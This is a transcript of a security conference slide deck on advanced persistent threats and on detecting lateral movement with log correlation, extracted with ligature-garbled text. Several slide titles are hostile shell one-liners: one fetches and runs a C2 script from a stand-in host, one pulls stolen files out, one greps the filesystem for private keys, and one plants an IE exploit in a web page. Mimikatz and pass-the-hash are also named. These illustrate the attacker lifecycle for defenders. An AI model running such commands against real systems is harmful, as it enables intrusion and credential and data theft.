advanced threats and lateral movement detection
TRANSCRIPT
![Page 1: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/1.jpg)
Advanced Threats & Lateral Movement Detec5on Greg Foss OSCP, GAWN, GPEN, GWAPT, GCIH, CEH Sr. Security Research Engineer LogRhythm Labs
![Page 2: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/2.jpg)
# whoami
• Greg Foss • Sr. Security Researcher • LogRhythm Labs – Threat Intel Team • Former DOE PenetraEon Tester • Focus => Honeypots, Incident Response, and Red Team • OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, etc…
2
![Page 3: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/3.jpg)
# ls -‐lha
IT Security Threats
Event CorrelaEon
DetecEon
DEMO!
1
2
3
4
3
![Page 4: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/4.jpg)
4
![Page 5: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/5.jpg)
# man [Advanced Threats]
• Advanced Persistent Threats • Organized Cyber Crime • Hack5vists • ‘Cyber Terrorists’ • Etc…
• Able to develop and uElize sophisEcated techniques in pursuit of their target objecEve from reconnaissance to data exfiltraEon.
• Will leverage the full spectrum of aWack vectors – social, technical, physical, etc.
• Highly organized, highly moEvated, highly resourced.
• Willing to invest significant Eme and resources to compromise.
5
![Page 6: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/6.jpg)
It’s when, not if…
• Mission Oriented
• Persistent an Driven
• PaEent and Methodical
• Focus on exponenEal ROI
• Emphasis on high IP value targets
• They will get in…
6 Image: hWp://pos^iles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg
![Page 7: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/7.jpg)
Iden5fy a ‘Hacker’
7
![Page 8: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/8.jpg)
Ok, for real…
• *Simple… Correlate on odd network / host ac5vity • Use the data at hand to acEvely detect anomalies • Understand how your organizaEon will respond to a breach /
outage / squirrel affecEng any of the three InfoSec pillars • Confiden5ality • Integrity • Availability
8
![Page 9: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/9.jpg)
Advanced Threat Tac5cs and Evasion
• Threat actors of all types move slowly and quietly over Eme. LimiEng exposure and potenEal for discovery.
• Trending on enterprise data over Eme helps to build baselines that can be used to ac5vely iden5fy anomalies.
9
![Page 10: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/10.jpg)
IT Security Threats
10
![Page 11: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/11.jpg)
# last && echo ‘How are they geYng in??’
• Phishing • 91% of ‘advanced’ aWacks began with a phishing email or
similar social engineering tacEcs. • hWp://www.infosecurity-‐magazine.com/view/29562/91-‐of-‐apt-‐aWacks-‐
start-‐with-‐a-‐spearphishing-‐email/
• 2014 Metrics • Average cost per breach => $3.5 million • 15% Higher than the previous year
• hWp://www.ponemon.org/blog/ponemon-‐insEtute-‐releases-‐2014-‐cost-‐of-‐data-‐breach-‐global-‐analysis
11
![Page 12: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/12.jpg)
# last && echo ‘How are they geYng in??’
• Phishing • 91% of ‘advanced’ aWacks began with a phishing email or
similar social engineering tacEcs. • hWp://www.infosecurity-‐magazine.com/view/29562/91-‐of-‐apt-‐aWacks-‐
start-‐with-‐a-‐spearphishing-‐email/
• 2014 Metrics • Average cost per breach => $3.5 million • 15% Higher than the previous year
• hWp://www.ponemon.org/blog/ponemon-‐insEtute-‐releases-‐2014-‐cost-‐of-‐data-‐breach-‐global-‐analysis
12
![Page 13: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/13.jpg)
# history | more
• It only takes one…
13
![Page 14: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/14.jpg)
# ./searchsploit ‘client side’ && echo ‘new exploits daily!’
14
![Page 15: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/15.jpg)
# cat [cve-‐2014-‐6332] >> /var/www/pwn-‐IE.html
15
![Page 16: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/16.jpg)
Event Correla5on & Detec5on
16
![Page 17: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/17.jpg)
Defense in Depth
17
![Page 18: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/18.jpg)
Spear Phishing
18
![Page 19: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/19.jpg)
Phishing Aback Log Traces
19
![Page 20: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/20.jpg)
$ vim next.sh
• Maintain Access…
20 Image: hWp://www.netresec.com/images/back_door_open_300x200.png
![Page 21: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/21.jpg)
$ ./next.sh
• Then?
• *Nothing…
• For a long Eme… • *not really*
• They have aWained a foothold and are now your newest employees…
21
![Page 22: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/22.jpg)
$ su -‐ root
22
![Page 23: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/23.jpg)
# wget hbp://bad.stuff.net/c2.py . && ./c2.py
• Once infected, the beachhead will beacon periodically
23
![Page 24: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/24.jpg)
Behavioral Analy5cs
• Beaconing Ac5vity – Usually iniEated over port 443 or an encrypted tunnel over port 80.
• Can be detected with a Firewall or Web Proxy • Capability to decrypt SSL traffic is a huge plus
• Behavioral analy5cs can be uElized to differenEate normal browsing acEvity from possible evidence of an infected host. • Using a SIEM, track the unique websites usually visited, and the overall
volume of normal web acEvity, on a per user and a per host basis. • Watch for significant changes over an extended period of Eme.
24
![Page 25: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/25.jpg)
Reconnaissance
• Ping sweeps, service discovery, etc. – NO
• Why make unnecessary noise?
• Instead => access network shares, web apps, and services
• Passively gather informaEon using available resources…
25 Image: hWp://macheads101.com/pages/pics/download_pics/mac/portscan.png
![Page 26: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/26.jpg)
Lateral Movement
• Dump Local System Hashes • Maybe crack them, maybe it’s not even necessary…
• Pass the Hash (PtH)
• Dump plain text passwords • Mimikatz -‐-‐ FTW!
• Act as an internal employee -‐-‐ use legiEmate means to access resources.
26
![Page 27: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/27.jpg)
Uncovering Internal Reconnaissance and Pivo5ng • Security OperaEons Goal => Reduce MTTD and MTTR
• MTTD – Mean Time to Detect • MTTR – Mean Time to Respond
• Set Traps => Honeypot / Honey Token access
• Overt Clues => ModificaEon of user / file / group permissions and pivoEng evidence
• Subtle Clues => VPN access from disparate geographical locaEons
• Missed Opportuni5es => Once inside, they are now an ‘employee’…
27
![Page 28: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/28.jpg)
Lateral Movement Log Traces
• Microsos’s granular Event IdenEficaEon schema (EVID) in conjuncEon with environment informaEon provides analysts with plenty of informaEon to track aWackers once they have breached the perimeter.
28
![Page 29: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/29.jpg)
Passive Data Extrac5on
• Well Poisoning via UNC Paths
• SMB Replay
• Help Desk Tickets
• Responder – By Spider Labs
• Keylogging
29
![Page 30: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/30.jpg)
Passive Traffic Analysis
• Analyze / capture anything that comes across the wire.
• ARP poison hosts of interest, take over switches/routers, etc.
30 Image: hWps://i.chzbgr.com/maxW500/5579525376/h7D009AE4/
![Page 31: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/31.jpg)
# grep –rhi ‘private key’ /* && echo “Iden5fy Key Resources”
• Keys / CerEficates / Passwords • File Shares and Databases
• Intellectual Property
• Domain Controllers / Exchange / etc.
• Business Leaders – CXO, Director, VP, etc. • AdministraEve Assistants
31 Image: hWp://www.mobilemarkeEngwatch.com/wordpress/wp-‐content/uploads/2011/07/Top-‐Secret-‐Tip-‐To-‐Pick-‐SMS-‐Keyword.jpeg
![Page 32: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/32.jpg)
# wget hbp://target/files.tgz && echo “Data Exfiltra5on”
• Target data idenEfied, gathered, and moved out of the environment.
• Data is normally leaked in a ‘hidden’ or modified format, rarely is the actual document extracted.
• Emails and Employee PII
• Intellectual Property
• Trade Secrets
32 Image: hWp://www.csee.umbc.edu/wp-‐content/uploads/2013/04/ex.jpg
![Page 33: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/33.jpg)
Data Exfiltra5on is Open Not ‘Advanced’
33
![Page 34: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/34.jpg)
Catching Data Exfiltra5on
• Granular restric5ons on sensi5ve files and directories to specific groups or individuals, alert on any abnormal file access / read / write / etc.
• DNS exfiltra5on or someEmes even ICMP Tunneling in high security environments
• Non-‐SSL over ports 443 / 8443, encrypted TCP over ports 80 / 8080
• Abnormal web server ac5vity, newly created files, etc.
34
![Page 35: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/35.jpg)
It all comes down to Event Correla5on
35
![Page 36: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/36.jpg)
DEMO
36
DEMO
![Page 37: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/37.jpg)
Closing Thoughts…
• Don’t be hard on the outside, sos and chewy on the inside…
• Implement Layer 3 (network) SegmentaEon and Least User Privilege
• Understand your environment and log data so that you can accurately correlate physical and cyber events
• Implement URL filtering, stateful packet inspecEon, and binary analysis
• AcEvely alert on and respond at the earliest signs of lateral movement and reconnaissance observed within your environment
• The earlier you can detect aWackers the beWer…
37
![Page 38: Advanced Threats and Lateral Movement Detection](https://reader033.vdocuments.us/reader033/viewer/2022052606/5888f1d41a28ab87728b68a1/html5/thumbnails/38.jpg)
Thank You!
38
QUESTIONS?
Greg Foss
OSCP, GAWN, GPEN, GWAPT, GCIH, CEH Senior Security Research Engineer
Greg.Foss[at]logrhythm.com @heinzarelli